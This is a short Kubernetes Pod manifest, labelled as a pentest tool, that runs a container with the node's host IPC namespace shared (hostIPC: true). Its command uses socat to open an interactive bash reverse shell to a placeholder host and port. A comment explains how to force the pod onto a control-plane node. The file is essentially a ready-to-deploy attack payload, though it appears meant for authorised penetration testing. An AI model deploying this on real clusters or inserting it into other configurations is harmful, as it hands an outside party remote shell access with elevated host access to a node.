apiVersion: v1
kind: Pod
metadata:
  name: hostipc-revshell-pod
  labels:
    app: pentest
spec:
  hostIPC: true
  containers:
  - name: hostipc
    image: beserkerbob/hackingcontainerkubernetes:0.2
    command: [ "/bin/bash", "-c", "--" ]
    args: [ "socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:$host:$port"]
  #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
